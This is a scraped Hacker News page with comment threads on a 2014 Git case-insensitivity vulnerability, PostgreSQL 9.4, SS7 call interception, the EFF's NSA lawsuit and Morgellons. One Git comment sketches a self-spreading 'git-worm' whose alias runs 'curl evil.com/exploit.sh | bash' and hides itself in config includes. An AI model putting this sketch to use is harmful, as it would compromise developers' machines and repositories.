hacker news with inline top comments    .. more ..    19 Dec 2014 News
home   ask   best   3 years ago   
1
Git client vulnerability announced
433 points by polemic  4 hours ago   104 comments top 23
1
FiloSottile 4 hours ago 5 replies      
Short panic summary: your git/hg remotes can get code execution on your machine when you clone/pull if you are on OSX or Windows.

Summary: on case-insensitive/normalizing filesystems (default on OSX and Windows) it's possible for .git/config to be overwritten by the tree, probably due to a case-sensitive sanity check when the actual file is insensitive. .git/config can contain arbitrary commands to be run on certain events/as aliases, so it leads to code execution. This is a risk when you get a tree from a third party, so on pull/fetch+checkout/clone...

There's an analogous vulnerability in Mercurial.

Update, then run git --version and make sure it's one of v1.8.5.6, v1.9.5, v2.0.5, v2.1.4, or v2.2.1. And be careful when pulling/cloning from third-parties.

EDIT: right, no "or", what are you doing reading this instead of updating?

2
userbinator 20 minutes ago 0 replies      
I think here is a good argument for not using case-insensitive filesystems - because every single filename comparison gets affected and it can lead to vulnerabilities like this (I wonder what others are out there...) Case-insensitive initially feels like a good idea to some, but I think it's a good example of "trying to do too much" and often in subtle ways that even the user might not fully understand - the definition of "case" changes with locale, for instance. In contrast, with filenames that are treated as dumb and simple, plain sequences of bytes that just cannot contain certain characters (and thus compared accordingly for equality, bit-by-bit), there is no need to even consider the concept of "case", and no ambiguity: It either matches exactly or doesn't match.

(I am aware of all the - quite frankly ridiculous - complexity of Unicode characters that are visually identical and "should be treated as such for the purposes of comparison", but I think that's another example of excess complexity leading to things like directory-traversal attacks.)

3
necubi 4 hours ago 6 replies      
Homebrew just updated (https://github.com/Homebrew/homebrew/pull/35105), so Homebrew users should be covered by

    brew update && brew upgrade git

4
yourad_io 4 minutes ago 0 replies      
Isn't it pretty nonchalant that git-scm.com doesn't have a huge red banner advising people to "pay attention and update, or face the pwn"?

Maybe alert banners aren't in the git-scm.com css template.

5
vog 1 hour ago 3 replies      
Ouch! And I thought the OpenBSD people were paranoid for sticking with CVS. (because Git is too bloated and complex in their view, so they weren't able to review it thoroughly, which would have been the only way for them to trust it.)

I always get a strange, uneasy feeiling when the tin foil hats turn out to be right.

I wonder if they are right on GPG, too. For those who don't know this: The OpenBSD people refuse to sign their releases with that "far too complex" GPG tool, but created their own lightweight "signify" tool instead. [1]

[1] http://www.tedunangst.com/flak/post/signify

6
jazzychad 3 hours ago 5 replies      
If you don't want to use homebrew on mac, here is the list of commands I used to upgrade: https://gist.github.com/jazzychad/07c0c6da5709202e8106
7
califield 4 hours ago 3 replies      
I was wondering who found this vulnerability. You have to click through to the Git mailing list announcement[1]:

> A big "thanks!" for bringing this issue to us goes to our friends in the Mercurial land, namely, Matt Mackall and Augie Fackler.

It'd be interesting to hear how they came across this. Matt is the leader of the Mercurial project and Augie is a Mercurial core contributor.

This doesn't seem like a high priority upgrade since GitHub now blocks the vulnerability from being pushed to their servers.

[1] http://article.gmane.org/gmane.linux.kernel/1853266

edit: Upgrade ASAP!

8
baldfat 4 hours ago 2 replies      
>In addition, the following updated versions of Git address this vulnerability: Not everyone has the patch.

The Git core team has announced maintenance releases for all current versions of Git (v1.8.5.6, v1.9.5, v2.0.5, v2.1.4, and v2.2.1).

I have one Windows machine and went to update http://git-scm.com/download/win (preview Version 1.9.4)

It was released 3 months ago, on 2014-09-29.

https://msysgit.github.io Version 1.9.5 preview BUT no documentation that this is for a security fix)

Doesn't seem like I can update my git client

9
ethomson 4 hours ago 0 replies      
Visual Studio is affected by this; Microsoft has released patches for Visual Studio 2013, Visual Studio 2013 Update 4 and an updated Git Provider for Visual Studio 2012. Users of Visual Studio are urged to apply an update.

Brian Harry's blog has more information and links to download URLs for the updates: http://blogs.msdn.com/b/bharry/archive/2014/12/18/git-vulner...

10
tlarkworthy 4 hours ago 2 replies      
> We have also completed an automated scan of all existing content on github.com to look for malicious content that might have been pushed to our site before this vulnerability was discovered

did they find any problems? The post doesn't say...

11
amatix 4 hours ago 1 reply      
Git-worm concept:

* create an alias which does something evil "curl evil.com/exploit.sh | bash;", maybe as a typo (commti?) since "to avoid confusion and troubles with script usage, aliases that hide existing Git commands are ignored"

* exploit code finds other local git repos and infects them (maybe avoiding those with github/bitbucket remotes, since they'll be blocked)

* be innocuous-looking via git config's "include", so the bad aliases aren't obviously visible looking at ~/.gitconfig

12
dshankar 4 hours ago 4 replies      
Where can I find fixed git-related binaries without having to build from source myself? (Sorry, I'm lazy
13
avar 4 hours ago 1 reply      
Link to the patch that fixed it: https://github.com/git/git/commit/cc2fc7c
14
conorgil145 1 hour ago 0 replies      
Any Ubuntu users who are looking to update as a precaution might find this link to the "Ubuntu Git Maintainers" ppa useful: https://launchpad.net/~git-core/+archive/ubuntu/ppa

also: https://stackoverflow.com/questions/19109542/installing-late...

15
mholt 1 hour ago 0 replies      
> Git clients running on OS X (HFS+) or any version of Microsoft Windows (NTFS, FAT) are exploitable through this vulnerability. Linux clients are not affected if they run in a case-sensitive filesystem.

What about case-sensitive Mac file systems, like mine? I would imagine they are not vulnerable and that the author just overlooked this possibility in the article...

16
nodesocket 2 hours ago 1 reply      
I am running OSX Yosemite.

      ~  git --version    git version 1.9.3 (Apple Git-50)
When I navigate to http://git-scm.com/download/mac it downloads 2.0.1 which was released on 6/29/14. How can I upgrade to 1.9.5?

17
thomasfromcdnjs 3 hours ago 0 replies      
"Otherwise, an unsuspecting user can run git pull from an innocuous-looking-but-malicious repository and have the meta-information in her repository overwritten, or executable hooks installed by the owner of that repository she pulled from (i.e. an attacker)." [1]

You could pull down git hooks that root your box, pretty intense hack, update now!

1. http://git-blame.blogspot.com.es/2014/12/git-1856-195-205-21...

18
sillysaurus3 4 hours ago 2 replies      
Should programs periodically check for critical security fixes, and then refuse to run if the current version is affected?

It seems like there are a lot of people who don't really pay attention to social media or other security alert channels, who won't have a clue about the extent of this vulnerability. I'm sure they'd update if they knew "if I clone a malicious repo, I'm toast," but there's no way to inform them except by HN/Twitter/Reddit/mailing lists.

One could argue that they get what they deserve for being uninformed, but it seems like the ethical obligation might actually be on us to develop tools that ping home and ask whether it needs to stop working until it's updated.

Actually, I'm not sure it's ethical to embed such shutdown behavior into a tool that needs to be reliable. Maybe just a scary warning message like "This version is critically vulnerable, update immediately" every time the program runs would suffice.

19
praseodym 2 hours ago 0 replies      
Apple has fixed this in Xcode 6.2 beta 3: http://support.apple.com/en-us/HT204147
20
sumnulu 3 hours ago 0 replies      
Also case insensitive file systems has other problems with git, if your team has a sensitive one. Mac comes with defaulted to insensitive and that is not good.
22
jszymborski 3 hours ago 1 reply      
Anybody have an idea when SourceTree will have an update?
23
donutz 3 hours ago 0 replies      
There does not appear to be an updated version of git for cygwin just yet.
2
PostgreSQL 9.4 Released
590 points by petercooper  10 hours ago   150 comments top 29
1
pilif 10 hours ago 5 replies      
Like every year before, the Postgres team has blessed us with an early christmas present. And like every release post before, I'd like to use this opportunity to say thanks to the team for the awesome job they are doing year after year.

It's not just the database itself (and that's awesome on its own right), but it's also all the peripheral stuff: The documentation is seriously amazing and very complete, the tools that come with the database are really good too (like psql which I still prefer to the various UIs out there).

Code-wise, I would recommend anybody to have a look at their git repo and the way how they write commit-messages: They are a pleasure to read and really explain what's going on. If everybody wrote commit messages like this, we'd be in a much better place what code-archeology is concerned.

Patches from the community are always patiently reviewed and, contrary to many other projects, even new contributors are not really required to have a thick skin nor flame retardant suits. The only thing required is a lot of patience as the level of quality required for a patch to go in is very, very high.

Finally, there's #postgresql on Freenode where core developers spend their time patiently helping people in need of support. Some questions could be solved by spending 30 seconds in the (as I said: excellent) manual and some of them point to really obscure issues, but no matter what time it is: Somebody in #postgresql is there to help you.

I think there's no other free software project out there that just gets everything right: Very friendly community, awesome documentation, awesome tools, and of course and awesome product offering to begin with.

Huge thanks to everybody involved.

Also: Huge YAY for jsonb - I have many, many things in mind I can use that for and I have been looking forward to this for a year now.

2
tracker1 7 hours ago 1 reply      
Just want to say to the PostgreSQL and EnterpriseDB guys that it's always great to see the progress on this. My hopes for 9.5/10 is that we will see PLV8 and Replication baked into the actual release.

PLV8 is such a natural fit with the new JSON(B) types that it's probably going to become the most used extension with that data type... And imho sorely missing from the out of the box experience. I'm glad that they've concentrated on getting the data structure and storage right first. Hopefully we'll see this in vNext.

As to replication, I understand that this is part of EnterpriseDB's business model, just the same not having the basic replication pieces baked in, is still lacking compared to other databases. Even if the graphical tooling was commercial only, and all the knob frobbing via config or command line is more complex, having it in the box is a must imho. I actually really like how MongoDB handles their replica sets, and where RethinkDB is going with this as well. Though they aren't transactional SQL databases primarily, it's a must have feature these days. Replication with automagic failover is a feature that has gone past enterprise-only.

One last piece, would be if there were built in functions similar to the String.prototype.normalize that was added to JavaScript... so that input strings could be normalized easier for comparison/indexing, though PLV8 support could/would bring this readily.

All the same, thanks for all of your hard work, and I look forward to the future of PostgreSQL.

3
taspeotis 57 minutes ago 0 replies      
It looks like PostgreSQL is on track to slowly succeed MySQL as the de-facto open source database.

Microsoft tentatively seems to be settling on them as the preferred RDBMS for non-Windows platforms [1]:

> Within ASP.NET 5 our primary focus is on SQL Server, and then PostgreSQL to support the standard Mac/Linux environment.

I use EF+SQL Server and they're very much complementary and provide an excellent developer experience. NHibernate+SQL Server is woeful unless you want to use the loosely-typed Criteria stuff. NH's LINQ provider is terrible and it gets confused at the drop of a hat (call Distinct and then OrderBy? "I'm sorry Dave, I'm afraid I can't do that"). At this point I'm convinced only MS know how to write LINQ providers that won't fall over the moment you try to do something useful with them.

Microsoft writing a LINQ provider for PgSql is a great thing for running .NET code on non-Windows platforms.

[1] http://blogs.msdn.com/b/adonet/archive/2014/12/02/ef7-priori...

4
jeltz 9 hours ago 3 replies      
Looking forward to when we move to 9.4 so I can start using "sum(foo) FILTER (WHERE bar)" instead of the ugly "sum(CASE WHEN bar THEN foo END)".
5
systematical 10 hours ago 1 reply      
Switched over to PostgreSQL for a personal project for the json datatype. Great if you want some mongo-esque document storage without losing out on having a relational database.

http://clarkdave.net/2013/06/what-can-you-do-with-postgresql...

6
mrmondo 3 hours ago 0 replies      
Congratulations to the PostgreSQL team for continuously supporting and improving what is in my mind the best all-round database server out there.
7
radicalbyte 9 hours ago 2 replies      
Next year I really need to switch from MSSQL to Postgres. The work that the Postgres team have done in the last 2-3 years is really amazing.

They are also clearly reaping the benefits of some very smart architectural decisions, and that gives me the confidence that they will be able to continue innovating in the coming years.

8
davidgerard 2 hours ago 0 replies      
Postgres is about to be the new hotness. I mentioned to our hosting provider that we were looking into moving our in-house Oracle and MySQL to Postgres (off Oracle because it's expensive, off MySQL 'cos it's shit) and he said more than a few customers were looking into this precise move.

We're just getting into PG now, and it's just really nice to set up and use. I really wish more web stuff properly supported PG and didn't pretty much require MySQL.

9
gfodor 9 hours ago 0 replies      
JSONB is getting a lot of attention (and deservedly so) but logical decoding is much more exciting to me. Being able to capture postgres transactions to put into a durable log (like Kafka) for downstream processing is a fundamental tool needed to build a unified logging architecture. If you've worked with hadoop you've probably tried to approximate this by hand by taking regular snapshots of your database or something, but this is much, much more sane. Really exciting. Great work postgres team!
10
davidw 6 hours ago 0 replies      
There are a lot of things that have changed since my first programming job, back in 1997. Things that I still use and love: Postgres, and Emacs.
11
squigs25 9 hours ago 0 replies      
I'm really pumped about the update to GIN indexes, and the ability to concurrently update materialized views. Both enhancements are huge for the postgres ecosystem, and especially for productionizing postgres databases.
12
jvinet 6 hours ago 0 replies      
With JSONB here, JSONPath starts to become very interesting...

http://goessner.net/articles/JsonPath/

http://blog.redfin.com/devblog/2012/03/json_in_postgres.html

That article was written before JSON/JSONB showed up, but the idea remains the same.

I didn't have plv8 installed, so I did some plumbing code in plpython. plv8 would be more suitable though.

https://github.com/jvinet/pg-jsonpath

13
mgkimsal 7 hours ago 0 replies      
Is there an equivalent to the MySQL handlersocket stuff in postgresql?

http://www.percona.com/doc/percona-server/5.5/performance/ha...

http://www.slideshare.net/akirahiguchi/handlersocket-2010062...

It might go against the "no transaction" crowd, but seems useful for performance-critical needs. I'm scheduling a bit of testing time with it next week to see if it's something I'd roll out in production (Maria 10 system)

14
codeaken 9 hours ago 3 replies      
Did PostgreSQL just kill MongoDB?
15
gamesbrainiac 10 hours ago 0 replies      
EFF launches an iconic case and PG 9.4 on the same day? This is probably the best day in the year and its not even christmas yet.
16
tiffanyh 8 hours ago 0 replies      
I really wish someone would update these benchmarks to the latest releases of Scientifc Linux, FreeBSD & Dragonfly

http://www.dragonflybsd.org/performance/

17
atonse 10 hours ago 5 replies      
Great news! I'd love to move over to this from MongoDB for a project that has high uptime requirements. But while I think the JSON will really replace it, does PG have a solution for High Availability (like replica sets) in the works?

I'm newer to Postgres so am not sure. Replica Sets are the killer feature for me, more so than just storing JSON documents. I'd appreciate if someone can chime in. I've done some googling but there seem to be multiple strategies for replication.

18
k_sze 10 hours ago 1 reply      
Bye bye MongoDB.
19
elchief 6 hours ago 0 replies      
Full notes here:

http://www.postgresql.org/docs/9.4/static/release-9-4.html

My favourite parts:

Allow views to be automatically updated even if they contain some non-updatable columns

Allow control over whether INSERTs and UPDATEs can add rows to an auto-updatable view that would not appear in the view. This is controlled with the new CREATE VIEW clause WITH CHECK OPTION.

Allow security barrier views to be automatically updatable

20
netcraft 9 hours ago 2 replies      
How long till someone creates a library with the mongo api?
21
ageyfman 2 hours ago 0 replies      
we currently use 9.4 beta, and it's been rock solid for us. We chose it because of the jsonb data type. JSONB has been a great fit for the type of work that we needed it to do.
22
petercooper 9 hours ago 2 replies      
Are there any good books coming out that cover Postgres 9.4? I know the docs are okay but I want something with more of a narrative structure as my history with Postgres is spotty. The only one I've found so far is O'Reilly's "PostgreSQL: Up and Running, 2nd Edition" coming out this month but would prefer a personal rec.
23
rpedela 8 hours ago 0 replies      
I am pretty happy about the addition of ALTER SYSTEM. I haven't tried it yet, but I think it will make automatic failover to a standby easier to implement. Does anyone have experience with this?
24
steventhedev 10 hours ago 4 replies      
Quick question regarding JSONB:

Is attribute order stable? Obviously, order is not preserved, but if the order changes on subsequent accesses, this causes problems if you ever serve content directly from a jsonb field without sorting the attributes manually.

25
aswanson 8 hours ago 0 replies      
Even though rails hides it from me, I honestly don't mind directly working with the SQL interface on this db, and it's language interfaces are awesome. Thanks, team.
26
apetresc 10 hours ago 1 reply      
So when can we expect AWS RDS to support it? :)
27
photograve 9 hours ago 0 replies      
Anyone has a performance benchmark and/or has experience on the scalability on this version?
28
sarciszewski 10 hours ago 0 replies      
Best news I've heard all week. Awesome. Time to update my servers :D
29
curiously 3 hours ago 0 replies      
I just recently began using PostgreSQL albiet an older version. Does this 9.4 mean that MongoDB is now pretty much a dud? Being able to store, manipulate, query JSON data AND have SQL on a established wheel that have been proven reliable and polished far longer than the age of most other databases?

Are there any code examples (preferably Python) that show how to use JSONB? I'd love to see some examples on how to query every record that contains a key in a json, or order rows based on a value in a json object.

off topic: If Meteor.js implements PostgreSQL 9.4 I would seriously consider using it again. That and maybe make DDP scalable.

3
German researchers discover flaw that could let anyone listen to cell calls
170 points by haakon  6 hours ago   77 comments top 9
1
MichaelCrawford 6 hours ago 3 replies      
There is a maintenance mode in every cell phone that allows it to be remotely turned on, that is, used as a listening device, without your knowledge.

I don't know what authentication is required. I expect that it was designed so that only your cell carrier could enable it, however whatever may have been secret about it, quite likely has leaked out by now.

If you don't want to be listened-to, don't have _any_ cell phones anywhere near you. Not just your own - say you want a private conversation in a public place; the phones of other people in your general vicinity could be switched on to listen to you.

I learned this from a well-known left-wing radical organization known as the United States Air Force, when I applied for the USAF Cyber Command. Their site had a recruiting video, that depicted a couple officers locking their phones into a grounded metal box - a faraday cage - before entering a secure area, that is, a room where secrets were openly discussed.

2
Animats 4 hours ago 2 replies      
Signaling System 7 (SS7) is a big security problem. It's the packet-switched control network for the phone system, and it has very little security. It was designed in 1980 to be run only internally between phone switches.

The main function of SS7 is call setup. All the switches along the route get their switching commands over SS7, not over the circuit-switched channel. (That went out with SS5, the old audio-tone based system). Call setup is preceded by "translation", turning a destination phone number into a route. That's done with query messages over SS7.

This allows outsourced wiretapping. Verisign offers this as a service for telcos, so they don't have to deal with law enforcement themselves.

http://www.verisign.com/static/001927.pdf

Verisign, which also runs much of the US SS7 network (http://www.verisign.com/stellent/groups/public/documents/dat...) is well placed to do this. All they have to do for a wiretap is to have the translations for a source or destination number reroute to a wiretap point, which then records while forwarding to the desired destination. As an SS7 provider, they already have all the call metadata.

Vulnerabilities come in because more parties now have SS7 access. Cellular roaming and VoIP to landline routing are managed over SS7. So a large number of computers other than dedicated telco switches now have SS7 connections. A break-in at any of those points has wiretapping potential.

3
tiler 1 hour ago 0 replies      
A couple of random thoughts on potential applications/uses:

1. Alexandria needs to communicate with Bilbo. Alexandria has the privilege of being trusted by whatever organization she belongs to (be that her country, company, etc) and as such is unmonitored AFAsheKs. Biblo on the other hand is some fugitive-type and is unable, or perhaps unwilling, to enter direct communication with Alexandria for fear of compromising himself or his beloved Alexandria. Bilbo could then monitor Alexandria's calls for an encoded message via a protocol they predetermine. This protocol could take the form of linguistic or audio steganography. One could image all sorts of information being leaked by Alexandria.

2. More realistically this could be tool for bribery. Monitor a set of vulnerable targets, wait until they reveal something, take a bribe to stay quite.

3. Or, for the Machiavellian-minded leak information that was supposedly confidential between two parties.

4
darkhorn 3 hours ago 0 replies      
In Turkish Ministry of Foreign Affairs it is forbidden to bring cell phones in to meetings. However it is totally okay to bring tablets and laptops into the meetings. Source: my friend works there.

Edit: phones are forbidden due to the recent spying events.

5
spacefight 5 hours ago 1 reply      
Of course we can be sure, that those fellows were not the first to learn about that.

The hack of belgium telco Belgacom sees more light day by day.

This system is broken beyond repair. We need to build it up from the ground, safe.

6
upofadown 3 hours ago 0 replies      
The only interesting thing here is the new attack at the radio level that allows call monitoring. It sounds like it might be easier than setting up a fake tower. It still sounds like it required an active attack though so in practice the difference might be all that important.
7
guelo 3 hours ago 1 reply      
"anyone" can not listen to your cell calls. Only people that have access to inject commands into the SS7 network that your call is routed through can do that.
8
eyeareque 4 hours ago 0 replies      
One more reason to encrypt every bit we send and to use voip instead of the PSTN/Cellular voice.
9
at-fates-hands 3 hours ago 0 replies      
An interesting read on the current state of SS7, circa 2013:

http://blog.pt.com/vendors-eol-announcement

The 3G/4G segment of subscribers will have a distribution of 3.4 billion using 3G (SS7) services and .9 billion using 4G services. The total outcome of this research indicates that a total of 7.65 billion subscribers, out of a total of 8.5 billion subscribers, will remain on SS7-based networks in 2017.

Verizon went on to further explain that a final 2G/3G (SS7) sunset timeframe decision has not been made.

The good news is vendors are not happy considering the availability of hardware is will decrease significantly over the same time period, hopefully speeding the sunset for this technology.

Some service providers are planning on a strategy of consolidating their network, having no support and cannibalizing existing spare equipment for hardware support.

4
EFF in Court to Argue NSA Collection from Internet Backbone Is Unconstitutional
646 points by etr71115  11 hours ago   153 comments top 17
1
diafygi 10 hours ago 3 replies      
FYI, these proceedings are open to the public. I've gone to two of them before to support the EFF. You just wear a suit and sit in the audience quietly. When the arguments (which are fascinating, by the way) are over everyone gets up at the same time and leaves. Hopefully, the judges notice how much public support is there for the EFF.

If you are in the bay area, I highly encourage you to go (this one is very near the Oakland 12th St BART). You are watching history in the making.

2
joshstrange 10 hours ago 4 replies      
If you haven't already go to this link (Probably need to be logged into Amazon):

https://smile.amazon.com/gp/charity/change.html?ie=UTF8&ref_...

And select EFF as your Smile charity. THEN get the browser extension to automatically redirect you to the Smile link:

Chrome: https://chrome.google.com/webstore/detail/smile-always/jgpmh...

Firefox: https://addons.mozilla.org/en-US/firefox/addon/amazonsmilere...

EDIT: I only use the chrome extension, if someone has a better FF extension just let me know and I'll change the link, that was the first one I found.

3
iandanforth 10 hours ago 1 reply      
"Under the government's legal theory, it can copy virtually all Internet communications and then search them from top to bottom for specific "identifiers"all without a warrant or individualized suspicionas long as it does so quickly using only automated processes."

Love it. I hadn't thought of it like that before. Just because your search is fast doesn't mean it's not a search.

4
Raphmedia 10 hours ago 2 replies      
This is it. This is the tipping point. I'm donating money to the EFF.
5
0x5f3759df-i 9 hours ago 0 replies      
The title seems a little misleading

>Jewel was filed in 2008 on behalf of San Francisco Bay Area resident Carolyn Jewel and other AT&T customers.

This isn't a new lawsuit, it has just taken forever to even get to this point. The main focus of this case isn't from the Snowden documents but the Snowden documents did open up the case to actually go forward without State Secrets censorship.

6
aragot 10 hours ago 1 reply      
The Fourth only protects 330 million out of 7 billion people.

However, if we don't help US citizen for their democracy, we'll have no weight for ours.

7
gamesbrainiac 10 hours ago 0 replies      
Donating money to EFF. Finally. I've been waiting so long :)
8
spacefight 10 hours ago 0 replies      
This is exactly what we need: worldwide and on a large scale. Bundled with media support, grass roots call for action campaigns and much more.

Let them know we won't accept the status quo.

9
zimbatm 10 hours ago 2 replies      
If I send a copy of a music record by email and the NSA keeps a copy of it, can they be sued for copyright infringement ?
10
dustinfarris 9 hours ago 0 replies      
EFF joins the ranks of ACLU in my book. Donated.
11
Constitutional 1 hour ago 0 replies      
The courts do have power in the federal government. If they say that some law is unlawful, then it is not able to be enforced as a law. The courts have that power since the constitution gives it to them. I think that you need to look at constitutional law a little more. The Executive branch does not have more power then the courts or the Congress. By the constitution.
12
csandreasen 1 hour ago 0 replies      
I don't think the EFF is going to win this one. It's not because of some government conspiracy, or the odds being stacked against them or anything like that, but rather because their argument is flawed. As detailed elsewhere on the EFF's site[1], the core of their case centers around NSA's Section 702 Upstream collection. They have more recently hinged their argument on the Privacy and Civil Liberty Oversight Board report on Section 702[2], but the case predates it going back as far as Mark Klein's Room 641A disclosure. The identifiers that the EFF talks about are described in the report as follows:

As noted above, however, all upstream collection of which about collection is asubset is selector-based, i.e., based on . . . things like phone numbers or emails. Justas in PRISM collection, a selector used as a basis for upstream collection is not a keywordor particular term (e.g., nuclear or bomb) but must be a specific communicationsidentifier (e.g., email address). In other words, the governments collection devices arenot searching for references to particular topics or ideas, but only for references to specificcommunications selectors used by people who have been targeted under Section 702.

In other words, the NSA is searching for the communications of specific people - it's targeted collection. The EFF itself even concedes that they are filtering out wholly domestic communications[3]. Instead of questioning the specific procedures for targeting these people, the likelihood that they may fail and collect an innocent bystander's communications, the procedures dealing with incidental or accidental collection, etc., they are instead taking the stance that the filtering itself is illegal because a packet filter needs to see a packet before determining whether or not it matches the specific communication. As an analogy, if where to pull up my terminal and run:

  $ seq 1 3 | grep -v 2 | grep 3 > out.txt
... the government is arguing that the collection is the contents of out.txt ("3") and furthermore, they put an extra measure in place to ensure that the number 2 (i.e. purely domestic communications) is never collected. The EFF is arguing that 1, 2 and 3 are all collected because each one exists in grep's buffer for a millisecond before it is discarded - it doesn't matter that it's never seen by a human, entered into a database, written to disk or transmitted elsewhere.

I think I see why the EFF is making that argument: in Clapper v. Amnesty International it was ruled that the plaintiff didn't have standing because they couldn't show that their specific communications had been collected. Jewel v. NSA would likely have the same issue, so to get around it the EFF is instead arguing that the very fact that the NSA is conducting any sort of packet filtering itself constitutes a search and seizure, regardless what safeguards are put in place or whether the filtering is targeted. I think they're grasping for straws with this one - I'd be really surprised if they win. If I were in their place, I'd probably FOIA the hell out of the 702 procedures and look for loopholes instead.

[1] https://www.eff.org/press/releases/eff-asks-judge-rule-nsa-i...

[2] http://www.pclob.gov/Library/702-Report-2.pdf

[3] https://www.eff.org/files/2014/07/24/backbone-3c-color.jpg

13
sgt101 6 hours ago 1 reply      
What Internet Backbone is that? The one that closed in 1995?
14
cevaris 6 hours ago 0 replies      
What???!!
15
cm2187 10 hours ago 3 replies      
I am a supporter of the EFF but I don't really see the point of suing the NSA. If they loose, they will call it something else keep doing it. And the NSA is only one of the offenders. Don't think foreign gvt aren't doing the same on their side of the cable. The only solution is systematic encryption. The EFF's let's encrypt effort is way more constructive in my mind.
16
LLWM 10 hours ago 7 replies      
All these comments about donating to the EFF. Any way I can donate money to the NSA to balance things out a bit?
17
shawn-butler 9 hours ago 3 replies      
>>>>

The court thus faulted them [the ACLU in ACLU v. NSA, 493 F.3d 644, 648] for assert[ing] a mere belief that the NSA eavesdropped on their communications without warrants. Id. This failure of proof doomed standing. Ultimately Jewel may face similar procedural, evidentiary and substantive barriers as the plaintiffs in ACLU, but, at this initial pleading stage, the allegations are deemed true and are presumed to embrace the specific facts needed to sustain the complaint. [0]

>>>

EFF is on a fishing expedition. I am not unsympathetic. But this judicial arm-twisting and absurd twisting of language / law needs to stop as the road it opens is not helpful to our democracy. They will never be able to justify their claims with anything that will pass evidentiary muster.

Supporting the EFF is all fine but generally a waste of time and money for effecting real change. The only way these programs end is if Congress is full of people who want this to stop and will ensure that it does.

If an obscure libertarian like Grover Norquist can dominate electoral cycles with a "Taxpayer Protection Pledge" why can someone not similarly dominate electoral cycles with a "Privacy Protection Pledge"? Demand every presidential candidate sign it, etc. Make it a real wedge issue.

I wonder if the answer is that US citizens don't care because they don't really see how they are harmed? They believe the Govt is protecting them by doing this?

[0]: http://cdn.ca9.uscourts.gov/datastore/opinions/2011/12/29/10... [pdf]

5
The Itch Nobody Can Scratch
54 points by Thevet  3 hours ago   24 comments top 12
1
sliken 6 minutes ago 0 replies      
Wouldn't it help the patients if the doctor cleaned an area of their effected skin, applied a large gauze pad, and taped it down. Let the patient go home for a few days. If there's new strange threads under it, it's obviously coming from the skin. If it's just threads from the environment, they should be absent.
2
everyone 5 minutes ago 0 replies      
The sufferers extremely clean behaviour; having 3 showers a day, bathing in bleach, having constantly clean clothes, using various lotions etc etc. is probably going to wreck their skin and cause itching.Personally my skin is very sensitive and tbh I'm much more comfortable when me, my clothes, bedclothes etc are not cleaned so often. Also I have read that the cleanliness of your average industrialised 1st world country house is far too clean and this may have a role in causing people to develop allergies or have other immune system related issues. We're not designed to live in medieval european city style filth, but we are certainly not designed for hyper-cleanliness either.
3
DanBC 1 hour ago 2 replies      
> Skeptics alike claim is actually at the root of Morgellons. They say that what people like him are really suffering from is a form of psychosis called delusions of parasitosis, or DOP. He is, in other words, crazy.

Fucking unhelpful to frame mental illness like this.

It is intensely frustrating to see people suffering - to the point where they consider suicide - because of the stigma around mental illness.

4
sebular 1 hour ago 0 replies      
Great article. The strangest part for me was the sudden onset that people experienced. When I think of psychological disorders, I think of how symptoms usually start small and gradually get more severe.

Everybody gets small phantom itches from time to time. I think the idea of an "itch nerve malfunction" makes the most sense. One could imagine some sort of infinite loop of itch nerves triggering each other, exacerbated by constant scratching.

Any strange psychological behavior, such as extreme cleanliness, or being convinced that ordinary clothing fibers are the cause, would be an obvious natural response if you couldn't figure out why you were suddenly so itchy.

Also, anyone who has to deal with contact lenses knows that our hands and fingers always have tiny little fibers stuck to them.

5
smrtinsert 30 minutes ago 0 replies      
I felt like the rat mite possibility was left open.
6
ryanmcbride 1 hour ago 0 replies      
The Stuff You Should Know podcast did an episode about this with some pretty great info. Delusional parasitosis is some crazy stuff. http://www.stuffyoushouldknow.com/podcasts/how-morgellons-di...
7
cpncrunch 1 hour ago 0 replies      
Itching is also a symptom of anxiety, so it could be that Morgellons patients get into a vicious circle of anxiety causing itching, which then causes more anxiety.

You can see an extreme example of this itching in alcohol and benzodiazepine withdrawal - apparently it causes feelings of your skin crawling.

8
Blackthorn 40 minutes ago 1 reply      
This one hits pretty close to home for me, because my dad had the "syndrome". He also got it as he was going through withdrawal from a cocaine addiction, so when the CDC report came out (it being a psychiatric condition) it made a lot of sense to me.

I don't really have anything interesting to add to the discussion, just that it's difficult to see a relative suffer like that.

9
wallaceowen20 17 minutes ago 0 replies      
This disease is "documented and described" in the online (then made into a book then made into a movie) "John dies at the end", as an interdimensional goo: http://en.wikipedia.org/wiki/John_Dies_at_the_End
10
cLeEOGPw 2 hours ago 2 replies      
There are countless ways how brain function can go wrong. Feeling things that don't exist are one of them. But even for the smartest people it can be extremely hard to convince himself that what he is feeling is not real.

Another problem with phantom feelings are that they can overlap with actual feelings. That means the brain feels itch on hand, for example, and scratching of that part triggers a relief response. This not only temporarily "fixes" the itch, but also strengthens the belief that the itch is real. After countless of these confirmations it can become near impossible to convince yourself that it is not real.

11
throw_qXH0TQ 29 minutes ago 0 replies      
Several years ago my wife and I discovered we had bed bugs. We were early twenties and had gotten married only nine months before. I started getting bitten about a month before we discovered the infestation. My wife was never bitten during the course of the infestation. We later learned that this is not uncommon with bed bugs.

Now the relation to the story about Morgellons. Bed bug bites can be extremely itchy and cause large welts on some people (not everyone as it is an allergic reaction). This was true in my case. The welts tended to be about the side of a silver dollar and last for about a week before subsiding.

We had contracted the bed bugs at a house party we had attended where I had gotten a few bites. We assume they were mosquito bites and didn't think another thing about them. About 2 weeks after that I started getting bites while I was sleeping. Never having been exposed to bed bugs I first assumed mosquito bites or perhaps spider bites. Neither of these cases turned out to be true.

After two more weeks I began to feel very crazy for lack of a better word. The itching from the bites was driving me wild and we could not figure out what was biting me. (The infestation was never a large one, most likely it started from a single insect). I went to the student health clinic (we were graduate students at the time). They concluded bug bites but we were not sure because we could not find any bugs!

I made an appointment with a private dermatologist. Now, before I got in to see him we did more research. We did turn up bed bugs as a possibility and we looked but not throughly enough and found nothing. (It turns out they are very very good at hiding). The research turned up all kinds of crazy things like the Morgellons disease and various mite related infestations, such as Bird Mites. Having a bird we became alarmed at that particular possibility as bird mites are tiny and very difficult to get rid of.

The internet research made my psychological condition rapidly deteriorate. I worried constantly about the different possibilities. It effect my ability to do research. It affected my ability to properly TA. I was becoming psychotic in my search for the causing the itching that would not cease.

Finally, I got the private dermatologist. He suggested bed bugs and told us to search again. This time, the infestation had grown and we found them. It was such a relief to know the cause.

However, the cure is neither fast nor simple nor cheap for bed bugs. Insecticides are ineffective as they only eat mammalian blood and the most effect insecticides these days need to be ingested by the organism. The most effect thing is physical removal of the insects, their eggs, and their larva. The eggs and larva are tiny and it takes very careful searching to find and clean them all.

